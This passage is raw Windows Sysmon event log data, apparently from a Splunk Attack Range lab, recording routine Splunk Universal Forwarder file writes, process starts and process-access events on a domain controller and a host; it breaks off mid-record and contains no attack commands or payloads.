AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:17.284{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=83D1CAD1E984C2F00F1ABE003CA3E718,SHA256=EFE6FBC09C3F10B19C2C1B629EF75FA8A4CA338E82526242A74FBC4ED9783BA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:17.016{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCF76B71A1E8BA317EEC48A5ADF8AA5A,SHA256=E40ED3541C23635A7252ED8B7FB927618DDB05D7F3DE1589B9D57222909CF56A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044437Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:14.695{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52358-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044439Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:18.576{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=013C19EFF39E4E8C87D72BF15776CB3E,SHA256=F74DB41A10F155B82FEDC300C2D1527BA780FA22C1304750B4E67A3D6E4FC38D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.675{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1866-629A-5542-000000005F02}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.675{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.675{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.675{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.675{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-1866-629A-5542-000000005F02}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.675{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.675{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1866-629A-5542-000000005F02}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.676{2E1864BB-1866-629A-5542-000000005F02}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.475{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1231BA047C5EC75208F814564A75BBD,SHA256=B04B249EC5ED5180DB6357517D446B27319489DC634F3CBEC340BDFAF61D6F19,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.447{2E1864BB-1866-629A-5442-000000005F02}8064172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.132{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F0ECF9EB32FE524F0CE01A9093635B6,SHA256=2DACB13277034E3F029D26F8CF169A9ADC6C0EE3A64B3F965395A7D676619D32,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.101{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1866-629A-5442-000000005F02}8064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.085{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-1866-629A-5442-000000005F02}8064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.085{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1866-629A-5442-000000005F02}8064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:18.087{2E1864BB-1866-629A-5442-000000005F02}8064C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044441Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:19.904{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=C8BC4D8568CD4AADDDE727B07EE018E5,SHA256=5F5C6D439702B3E76633075FB662A9795FF4CD308E87B5752896A177357BC935,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044440Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:19.670{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F4F72DF2E0C0F104921EA27B3C4C810,SHA256=BC2E8879D573131071818F0CBB179403EBF0FFE2069F8D7A6BF0F57206545523,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:19.656{2E1864BB-1867-629A-5642-000000005F02}48087396C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:19.338{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1867-629A-5642-000000005F02}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:19.338{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:19.338{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:19.338{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:19.338{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 